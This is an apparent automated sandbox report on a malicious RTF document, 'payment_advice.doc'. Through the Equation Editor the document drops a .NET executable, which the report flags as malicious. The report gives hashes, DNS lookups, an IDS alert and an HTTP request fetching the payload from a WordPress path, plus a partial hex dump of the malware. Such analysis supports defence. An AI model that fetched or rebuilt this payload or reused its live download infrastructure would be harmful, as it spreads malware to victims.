Preview:	[doc]..payment_advice.LNK=0..payment_advice.LNK=0..[doc]..payment_advice.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\payment_advice.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Tue Feb 23 23:53:35 2021, length=326273, window=hide
Category:	dropped
Size (bytes):	2068
Entropy (8bit):	4.58953129298372
Encrypted:	false
SSDEEP:	24:83/XTwz6Ikn1ZeAZGDv3qvdM7dD23/XTwz6Ikn1ZeAZGDv3qvdM7dV:83/XT3Ik1ZxZNvQh23/XT3Ik1ZxZNvQ/
MD5:	7217FC118D825A713A3F199A336910D2
SHA1:	ECFE1395983AA08F3213313F1D00804FF42D853C
SHA-256:	D6DF2D99D16F89EECBFD5042527D5EDDFD8F6C8E6F63DBD6CB590240F9FC70BE
SHA-512:	48AD7DD8066650C4A48987487C648827A3D9BCEE6D88D15AEC62BE8C572532273787D4B1E57786BBBA69D3C0451B691D64CC78348773CDEC0518369711D11A14
Malicious:	false
Preview:	L..................F.... ...8.E..{..8.E..{..y..zG................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....XR.. .PAYMEN~1.DOC..R.......Q.y.Q.y...8.....................p.a.y.m.e.n.t._.a.d.v.i.c.e...d.o.c.......\|...............-...8...[............?J......C:\Users\..#...................\\642294\Users.user\Desktop\payment_advice.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.y.m.e.n.t._.a.d.v.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......642294..........D_....3N...W...9F.C...........[D_

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\twox67345.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	629624
Entropy (8bit):	4.318973025796057
Encrypted:	false
SSDEEP:	6144:hB3ot6JPVsT7zFoRtMDC7lCAKSU3bd2SAHQBX/Mm+4bQLQUNStT:hlXfizFytMAlabES7MZEC/NMT
MD5:	3DC83F17122DD592D607424A54C1E9CB
SHA1:	CA3F7E0FAC52D80B1680994E8B07A4B7E589D6A4
SHA-256:	D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
SHA-512:	53676DD5D8C5957F84E512951353B7962529944EDEE3C4B8EB80D68EDDAACFE45AAD3843A1FC6406506223F1EE1317DF47A731A901BABB9CEE696CFB391DDC3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: VIws8bzjD5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..\|............... ........@.. ...............................~....@....................................W.......................x............................................................ ............... ..H............text...4{... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Xa..\|9...........................................................".(......s.........s.........s.........s.........B.(.......(........0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...$.......(...+o,.......88.......(-...........(........(.................(/...o%..

C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Download File
Process:	C:\Users\user\AppData\Roaming\twox67345.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	629624
Entropy (8bit):	4.318973025796057
Encrypted:	false
SSDEEP:	6144:hB3ot6JPVsT7zFoRtMDC7lCAKSU3bd2SAHQBX/Mm+4bQLQUNStT:hlXfizFytMAlabES7MZEC/NMT
MD5:	3DC83F17122DD592D607424A54C1E9CB
SHA1:	CA3F7E0FAC52D80B1680994E8B07A4B7E589D6A4
SHA-256:	D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
SHA-512:	53676DD5D8C5957F84E512951353B7962529944EDEE3C4B8EB80D68EDDAACFE45AAD3843A1FC6406506223F1EE1317DF47A731A901BABB9CEE696CFB391DDC3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: VIws8bzjD5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..\|............... ........@.. ...............................~....@....................................W.......................x............................................................ ............... ..H............text...4{... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Xa..\|9...........................................................".(......s.........s.........s.........s.........B.(.......(........0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...$.......(...+o,.......88.......(-...........(........(.................(/...o%..

C:\Users\user\Desktop\~$yment_advice.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.117334916955769
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	payment_advice.doc
File size:	326273
MD5:	0ea6e37e930278b71774ae91d68bb879
SHA1:	5e3721c21b04c30c0f2d3b7e83b7bb506fd55cb8
SHA256:	3fda6eb4d90828826854806f1956d0d4a20bf5f95eb917370ff05ba5ba1dde66
SHA512:	413836d6e2382e6177fba3114efef67c0d291ba04a18b5f0bb4284a54408319c74c72b13e3ecd7e452718091227c9314af37b20005e30d22cfa8fbc7d7a83ad6
SSDEEP:	6144:L6LYrUVjkXdCfWd5ppJI8L4s5kSFxNPnfokdH9jGIWmiKduNNZJRfFsJ:3BCfWdtJf3/dYkdH9qKd8DsJ
File Content Preview:	{\rtf991%4?_7&?`?]>`4,:~:.9?)7~,).=??',;9?0.=@?-?#.!9/6=.<2:>81$:_'?`~-?4!?]6633'(?'?,(=?[(`<%?~.+%(?=8>&-4>/=.!6~???6.%<.'!$1%^!#,?(?1:^_$=4.4?$?%6>-]9;3)?.;-(/9\|!_%><.->.!,$]]2^3[(?$#)&\|(.??.''?<.`@=(?<<;)~..(?4#?361?5._@,+,]&1(.?..,.$=?,?%4?447`?

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000142Ah								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-16:53:54.098868	TCP	2021697	ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious	49165	80	192.168.2.22	150.95.81.183

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 16:53:53.842025995 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.098081112 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.098285913 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.098867893 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.353571892 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356101036 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356157064 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356198072 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356232882 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356267929 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356306076 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.356307983 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356334925 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.356343031 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356368065 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.356376886 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356405020 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.356412888 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356450081 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.356451988 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.356468916 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.356519938 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.372745037 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.612919092 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.612977028 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613019943 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613019943 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613048077 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613055944 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613060951 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613092899 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613101959 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613131046 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613149881 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613187075 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613224030 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613230944 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613236904 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613267899 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613281012 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613312960 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613320112 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613354921 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613368034 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613425970 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613439083 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613461018 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613472939 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613497019 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613504887 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613539934 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613543987 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613588095 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.613594055 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.613663912 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.616348982 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.627536058 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.627619028 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868176937 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868235111 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868273020 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868309021 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868350029 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868387938 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868416071 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868452072 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868463039 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868489027 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868541002 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868546009 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868557930 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868565083 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868580103 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868602991 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868618011 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868633032 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868666887 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868666887 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868711948 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868752003 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868752003 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868777990 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868794918 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868824005 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868834019 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868849039 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868871927 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868911982 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868913889 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868932009 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.868951082 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.868977070 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.869003057 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.869024038 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.869048119 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.869066954 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.869088888 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.869118929 CET	49165	80	192.168.2.22	150.95.81.183
Feb 23, 2021 16:53:54.869129896 CET	80	49165	150.95.81.183	192.168.2.22
Feb 23, 2021 16:53:54.869153023 CET	49165	80	192.168.2.22	150.95.81.183

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 16:53:52.341901064 CET	52197	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:53:52.723155975 CET	53	52197	8.8.8.8	192.168.2.22
Feb 23, 2021 16:53:52.723788023 CET	52197	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:53:53.110671997 CET	53	52197	8.8.8.8	192.168.2.22
Feb 23, 2021 16:53:53.111388922 CET	52197	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:53:53.821729898 CET	53	52197	8.8.8.8	192.168.2.22
Feb 23, 2021 16:54:00.170200109 CET	53099	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:54:00.230391979 CET	53	53099	8.8.8.8	192.168.2.22
Feb 23, 2021 16:55:27.316231012 CET	52838	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:55:27.475828886 CET	53	52838	8.8.8.8	192.168.2.22
Feb 23, 2021 16:55:27.476371050 CET	52838	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:55:27.794637918 CET	53	52838	8.8.8.8	192.168.2.22
Feb 23, 2021 16:55:35.340843916 CET	61200	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:55:35.405267000 CET	53	61200	8.8.8.8	192.168.2.22
Feb 23, 2021 16:55:45.184340000 CET	49548	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:55:45.244551897 CET	53	49548	8.8.8.8	192.168.2.22
Feb 23, 2021 16:55:50.279475927 CET	55627	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:55:50.331012011 CET	53	55627	8.8.8.8	192.168.2.22
Feb 23, 2021 16:55:50.331909895 CET	55627	53	192.168.2.22	8.8.8.8
Feb 23, 2021 16:55:50.391808987 CET	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 16:53:52.341901064 CET	192.168.2.22	8.8.8.8	0x62a5	Standard query (0)	tunedinblog.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:53:52.723788023 CET	192.168.2.22	8.8.8.8	0x62a5	Standard query (0)	tunedinblog.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:53:53.111388922 CET	192.168.2.22	8.8.8.8	0x62a5	Standard query (0)	tunedinblog.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:54:00.170200109 CET	192.168.2.22	8.8.8.8	0x7a0a	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:27.316231012 CET	192.168.2.22	8.8.8.8	0x1271	Standard query (0)	mail.tpcdel.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:27.476371050 CET	192.168.2.22	8.8.8.8	0x1271	Standard query (0)	mail.tpcdel.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:35.340843916 CET	192.168.2.22	8.8.8.8	0x7a16	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:45.184340000 CET	192.168.2.22	8.8.8.8	0xf6f0	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:50.279475927 CET	192.168.2.22	8.8.8.8	0x4f2b	Standard query (0)	mail.tpcdel.com	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:50.331909895 CET	192.168.2.22	8.8.8.8	0x4f2b	Standard query (0)	mail.tpcdel.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 16:53:52.723155975 CET	8.8.8.8	192.168.2.22	0x62a5	No error (0)	tunedinblog.com	150.95.81.183	A (IP address)	IN (0x0001)
Feb 23, 2021 16:53:53.110671997 CET	8.8.8.8	192.168.2.22	0x62a5	No error (0)	tunedinblog.com	150.95.81.183	A (IP address)	IN (0x0001)
Feb 23, 2021 16:53:53.821729898 CET	8.8.8.8	192.168.2.22	0x62a5	No error (0)	tunedinblog.com	150.95.81.183	A (IP address)	IN (0x0001)
Feb 23, 2021 16:54:00.230391979 CET	8.8.8.8	192.168.2.22	0x7a0a	No error (0)	coroloboxorozor.com	172.67.172.17	A (IP address)	IN (0x0001)
Feb 23, 2021 16:54:00.230391979 CET	8.8.8.8	192.168.2.22	0x7a0a	No error (0)	coroloboxorozor.com	104.21.71.230	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:27.475828886 CET	8.8.8.8	192.168.2.22	0x1271	No error (0)	mail.tpcdel.com	103.35.120.75	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:27.794637918 CET	8.8.8.8	192.168.2.22	0x1271	No error (0)	mail.tpcdel.com	103.35.120.75	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:35.405267000 CET	8.8.8.8	192.168.2.22	0x7a16	No error (0)	coroloboxorozor.com	172.67.172.17	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:35.405267000 CET	8.8.8.8	192.168.2.22	0x7a16	No error (0)	coroloboxorozor.com	104.21.71.230	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:45.244551897 CET	8.8.8.8	192.168.2.22	0xf6f0	No error (0)	coroloboxorozor.com	172.67.172.17	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:45.244551897 CET	8.8.8.8	192.168.2.22	0xf6f0	No error (0)	coroloboxorozor.com	104.21.71.230	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:50.331012011 CET	8.8.8.8	192.168.2.22	0x4f2b	No error (0)	mail.tpcdel.com	103.35.120.75	A (IP address)	IN (0x0001)
Feb 23, 2021 16:55:50.391808987 CET	8.8.8.8	192.168.2.22	0x4f2b	No error (0)	mail.tpcdel.com	103.35.120.75	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

tunedinblog.com

coroloboxorozor.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	150.95.81.183	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 16:53:54.098867893 CET	1	OUT	GET /wp-includes/twox.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: tunedinblog.com Connection: Keep-Alive
Feb 23, 2021 16:53:54.356101036 CET	2	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 15:53:54 GMT Server: Apache/2.2.31 (CentOS) Last-Modified: Tue, 23 Feb 2021 07:25:52 GMT ETag: "211e7-99b78-5bbfbd40d5228" Accept-Ranges: bytes Content-Length: 629624 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 be 7d f2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 06 00 00 00 00 00 00 2e 9b 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 8c 7e 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 9a 09 00 57 00 00 00 00 a0 09 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 84 09 00 78 17 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 03 00 00 00 a0 09 00 00 04 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 82 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9b 09 00 00 00 00 00 48 00 00 00 02 00 05 00 58 61 09 00 7c 39 00 00 03 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 17 00 00 0a 00 2a a6 73 18 00 00 0a 80 01 00 00 04 73 19 00 00 0a 80 02 00 00 04 73 0b 00 00 06 80 03 00 00 04 73 1a 00 00 0a 80 04 00 00 04 2a 42 02 28 17 00 00 0a 00 00 02 28 09 00 00 06 00 2a 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 58 01 00 70 fe 0e 01 00 72 5c 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 20 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 2a 00 00 01 10 00 00 02 00 24 00 6a 8e 00 11 00 00 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 68 01 00 70 fe 0e 01 00 72 7e 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 24 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}0\|. @ ~@Wx H.text4{ \| `.rsrc~@@.reloc@BHXa\|9"(ssssB((0rXpr\ps+ 